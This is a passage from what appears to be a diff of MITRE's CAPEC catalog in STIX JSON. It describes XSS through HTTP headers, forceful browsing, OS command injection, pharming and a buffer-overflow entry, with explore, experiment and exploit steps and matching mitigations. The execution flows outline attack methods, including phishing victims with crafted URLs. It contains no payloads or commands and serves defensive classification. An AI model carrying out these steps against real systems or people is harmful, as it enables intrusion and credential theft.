  1. Survey the application for public links: Using a browser or an automated tool, an adversary follows all public links on a web site. They record all the entry points (input) that becomes part of generated HTTP header (not only GET/POST/COOKIE, but also Content-Type, etc.)

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters used in the HTTP headers.
    Look for HTML meta tags that could be injectable
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. [Probe identified potential entry points for XSS vulnerability]The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects various common script payloads to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited. They record all the responses from the server that include unmodified versions of their script.\n The adversary tries also to inject extra-parameter to the HTTP request to see if they are reflected back in the web page or in the HTTP response.\n

    2. Techniques
    Manually inject various script payloads into each identified entry point using a list of common script injection probes and observe system behavior to determine if script was executed.
    Use an automated injection attack tool to inject various script payloads into each identified entry point using a list of common script injection probes and observe system behavior to determine if script was executed.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.

  2. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.

    3. Techniques
    Change a URL parameter which is used in an HTTP header to include a malicious script tag. Because it is in the header it may bypass validation.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

    2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target software must be a client that allows scripting communication from remote hosts." + ], + "x_capec_resources_required": [ + "The adversary must have the ability to deploy a custom hostile service for access by targeted clients and the abbility to communicate synchronously or asynchronously with client machine. The adversary must also control a remote site of some sort to redirect client and data to." + ], + "x_capec_skills_required": { + "High": "Exploiting a client side vulnerability to inject malicious scripts into the browser's executable process.", + "Low": "To achieve a redirection and use of less trusted source, an adversary can simply edit HTTP Headers that are sent to client machine." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--117080d2-a3f1-4d19-8903-672ec63ff81f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--df64b21f-91ca-4495-9718-794582fa0ab8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--43bfa851-97cf-48ba-8050-69a14ce4b820", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--97eb8eeb-5e17-4a04-803b-c4de40723fc9", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6e5a1a01-0c47-4cc1-9ce2-6156b3d231b7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0b609b9c-0b10-497b-b953-c1d279689017", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d72764d4-b17e-42fe-81ba-463f07deb30f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4e7dfa2a-7e3f-483c-bd32-1110f0cbfb03", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c80de0f3-14b1-4da8-ab8f-01d6e8887f58", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--86dea14b-a9d1-461f-a1e0-ff289490c27e", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--77b4da2d-507c-490d-8270-6c9c321c6752", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker employs forceful browsing (direct URL entry) to access portions of a website that are otherwise unreachable. Usually, a front controller or similar design pattern is employed to protect access to portions of a web application. Forceful browsing enables an attacker to access information, perform privileged operations and otherwise reach sections of the web application that have been improperly protected.", + "external_references": [ + { + "external_id": "CAPEC-87", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/87.html" + }, + { + "external_id": "CWE-425", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/425.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "Predictable Resource Location", + "external_id": "34", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Predictable-Resource-Location" + }, + { + "description": "Forced browsing", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Forced_browsing" + } + ], + "id": "attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Forceful Browsing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A bulletin board application provides an administrative interface at admin.aspx when the user logging in belongs to the administrators group.\n An attacker can access the admin.aspx interface by making a direct request to the page. Not having access to the interface appropriately protected allows the attacker to perform administrative functions without having to authenticate themself in that role.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Spider: Using an automated tool, an attacker follows all public links on a web site. They record all the links they find.

    2. Techniques
    Use a spidering tool to follow and record all links.
    Use a proxy tool to record all links visited during a manual traversal of the web application.

Experiment

  1. Attempt well-known or guessable resource locations: Using an automated tool, an attacker requests a variety of well-known URLs that correspond to administrative, debugging, or other useful internal actions. They record all the positive responses from the server.

    2. Techniques
    Use a spidering tool to follow and record attempts on well-known URLs.
    Use a proxy tool to record all links visited during a manual traversal of attempts on well-known URLs.

Exploit

  1. Use unauthorized resources: By visiting the unprotected resource, the attacker makes use of unauthorized functionality.

    2. Techniques
    Access unprotected functions and execute them.

  2. View unauthorized data: The attacker discovers and views unprotected sensitive data.

    3. Techniques
    Direct request of protected pages that directly access database back-ends. (e.g., list.jsp, accounts.jsp, status.jsp, etc.)
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The forcibly browseable pages or accessible resources must be discoverable and improperly protected." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. A directory listing is helpful, but not a requirement." + ], + "x_capec_skills_required": { + "Low": "Forcibly browseable pages can be discovered by using a number of automated tools. Doing the same manually is tedious but by no means difficult." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Authenticate request to every resource. In addition, every page or resource must ensure that the request it is handling has been made in an authorized context.", + "id": "course-of-action--8b71c095-ad74-4c7c-9670-929e14eb0110", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-87-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c3b65115-d4f0-4a7d-a9d8-7c012f7e3787", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8b71c095-ad74-4c7c-9670-929e14eb0110", + "target_ref": "attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Forceful browsing can also be made difficult to a large extent by not hard-coding names of application pages or resources. This way, the attacker cannot figure out, from the application alone, the resources available from the present context.", + "id": "course-of-action--94eb039d-4dcb-40b2-bf6f-e98fe456747c", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-87-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6172678d-c4c1-4700-9518-deec24ab23cc", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--94eb039d-4dcb-40b2-bf6f-e98fe456747c", + "target_ref": "attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this type of an attack, an adversary injects operating system commands into existing application functions. An application that uses untrusted input to build command strings is vulnerable. An adversary can leverage OS command injection in an application to elevate privileges, execute arbitrary commands and compromise the underlying operating system.", + "external_references": [ + { + "external_id": "CAPEC-88", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/88.html" + }, + { + "external_id": "CWE-78", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/78.html" + }, + { + "external_id": "CWE-88", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/88.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "OS Commanding", + "external_id": "31", + "source_name": "WASC", + "url": "http://projects.webappsec.org/OS-Commanding" + }, + { + "description": "Secunia Advisory SA16869: Firefox Command Line URL Shell Command Injection, Secunia Advisories, 2005--09---20, Secunia", + "external_id": "REF-543", + "source_name": "reference_from_CAPEC", + "url": "http://secunia.com/advisories/16869/" + } + ], + "id": "attack-pattern--bfdeb5d3-c9da-44eb-bfd3-d3db719acfb3", + "modified": "2021-06-24T00:00:00.000Z", + "name": "OS Command Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2fb2b2b8-b7de-45a2-aadb-5849d12fda8f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A transaction processing system relies on code written in a number of languages. To access this functionality, the system passes transaction information on the system command line.\n An attacker can gain access to the system command line and execute malicious commands by injecting these commands in the transaction data. If successful, the attacker can steal information, install backdoors and perform other nefarious activities that can compromise the system and its data.See also: A vulnerability in Mozilla Firefox 1.x browser allows an attacker to execute arbitrary commands on the UNIX/Linux operating system. The vulnerability is caused due to the shell script used to launch Firefox parsing shell commands that are enclosed within back-ticks in the URL provided via the command line. This can be exploited to execute arbitrary shell commands by tricking a user into following a malicious link in an external application which uses Firefox as the default browser (e.g. the mail client Evolution on Red Hat Enterprise Linux 4)." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify inputs for OS commands: The attacker determines user controllable input that gets passed as part of a command to the underlying operating system.

    2. Techniques
    Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.
    TCP/IP Fingerprinting. The attacker uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.
    Induce errors to find informative error messages

  2. Survey the Application: The attacker surveys the target application, possibly as a valid and authenticated user

    3. Techniques
    Spidering web sites for all available links
    Inventory all application inputs

Experiment

  1. Vary inputs, looking for malicious results.: Depending on whether the application being exploited is a remote or local one the attacker crafts the appropriate malicious input, containing OS commands, to be passed to the application

    2. Techniques
    Inject command delimiters using network packet injection tools (netcat, nemesis, etc.)
    Inject command delimiters using web test frameworks (proxies, TamperData, custom programs, etc.)

Exploit

  1. Execute malicious commands: The attacker may steal information, install a back door access mechanism, elevate privileges or compromise the system in some other way.

    2. Techniques
    The attacker executes a command that stores sensitive information into a location where they can retrieve it later (perhaps using a different command injection).
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "User controllable input used as part of commands to the underlying operating system." + ], + "x_capec_skills_required": { + "High": "The attacker needs to have knowledge of not only the application to exploit but also the exact nature of commands that pertain to the target operating system. This may involve, though not always, knowledge of specific assembly commands for the platform." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use language APIs rather than relying on passing data to the operating system shell or command line. Doing so ensures that the available protection mechanisms in the language are intact and applicable.", + "id": "course-of-action--ca12abfd-929e-4a4d-9bc0-c87d1daf98db", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-88-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9de3eaad-1ea7-4658-a9af-71b7e6a839d3", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ca12abfd-929e-4a4d-9bc0-c87d1daf98db", + "target_ref": "attack-pattern--bfdeb5d3-c9da-44eb-bfd3-d3db719acfb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Filter all incoming data to escape or remove characters or strings that can be potentially misinterpreted as operating system or shell commands", + "id": "course-of-action--23d88ce3-abfc-4664-b193-3c5a020033f6", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-88-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--318ffd75-623d-4e4e-82ef-fe62b9837bef", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--23d88ce3-abfc-4664-b193-3c5a020033f6", + "target_ref": "attack-pattern--bfdeb5d3-c9da-44eb-bfd3-d3db719acfb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "All application processes should be run with the minimal privileges required. Also, processes must shed privileges as soon as they no longer require them.", + "id": "course-of-action--9edf924d-3f02-40cd-81ef-fd883a496feb", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-88-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--22a2ec23-338d-4ecf-ac2b-3692d8dd907d", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9edf924d-3f02-40cd-81ef-fd883a496feb", + "target_ref": "attack-pattern--bfdeb5d3-c9da-44eb-bfd3-d3db719acfb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "A pharming attack occurs when the victim is fooled into entering sensitive data into supposedly trusted locations, such as an online bank site or a trading platform. An attacker can impersonate these supposedly trusted sites and have the victim be directed to their site rather than the originally intended one. Pharming does not require script injection or clicking on malicious links for the attack to succeed.", + "external_references": [ + { + "external_id": "CAPEC-89", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/89.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-350", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/350.html" + } + ], + "id": "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Pharming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--ee604341-eb03-4b00-8188-26d6e999d6dc", + "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067", + "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f", + "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501", + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_child_of_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "\n An online bank website requires users to provide their customer ID and password to log on, but does not use a secure connection.\n An attacker can setup a similar fake site and leverage pharming to collect this information from unknowing victims.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Exploit

  1. Attacker sets up a system mocking the one trusted by the users. This is usually a website that requires or handles sensitive information.

  2. The attacker then poisons the resolver for the targeted site. This is achieved by poisoning the DNS server, or the local hosts file, that directs the user to the original website

  3. When the victim requests the URL for the site, the poisoned records direct the victim to the attackers' system rather than the original one.

  4. Because of the identical nature of the original site and the attacker controlled one, and the fact that the URL is still the original one, the victim trusts the website reached and the attacker can now \"farm\" sensitive information such as credentials or account numbers.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Vulnerable DNS software or improperly protected hosts file or router that can be poisoned", + "A website that handles sensitive information but does not use a secure connection and a certificate that is valid is also prone to pharming" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. Having knowledge of the way the target site has been structured, in order to create a fake version, is required. Poisoning the resolver requires knowledge of a vulnerability that can be exploited." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to be able to poison the resolver - DNS entries or local hosts file or router entry pointing to a trusted DNS server - in order to successfully carry out a pharming attack. Setting up a fake website, identical to the targeted one, does not require special skills." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "All sensitive information must be handled over a secure connection.", + "id": "course-of-action--7c0264a9-3fa6-4dd3-bf66-e37487316673", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-89-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0a29576b-049b-4956-8b53-ce4e9053139a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c0264a9-3fa6-4dd3-bf66-e37487316673", + "target_ref": "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Known vulnerabilities in DNS or router software or in operating systems must be patched as soon as a fix has been released and tested.", + "id": "course-of-action--ca76ad8b-bd0c-4eec-a930-535476f450af", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-89-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7002b548-99da-4471-becf-a12babe27aaa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ca76ad8b-bd0c-4eec-a930-535476f450af", + "target_ref": "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "End users must ensure that they provide sensitive information only to websites that they trust, over a secure connection with a valid certificate issued by a well-known certificate authority.", + "id": "course-of-action--26275ac3-7197-403e-90e8-58d6459057cb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-89-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--847a5a83-ab42-40dc-b158-f71498aa91cd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--26275ac3-7197-403e-90e8-58d6459057cb", + "target_ref": "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets command-line utilities available in a number of shells. An adversary can leverage a vulnerability found in a command-line utility to escalate privilege to root.", + "external_references": [ + { + "external_id": "CAPEC-9", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/9.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-733", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/733.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Buffer Overflow in Local Command-Line Utilities", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + 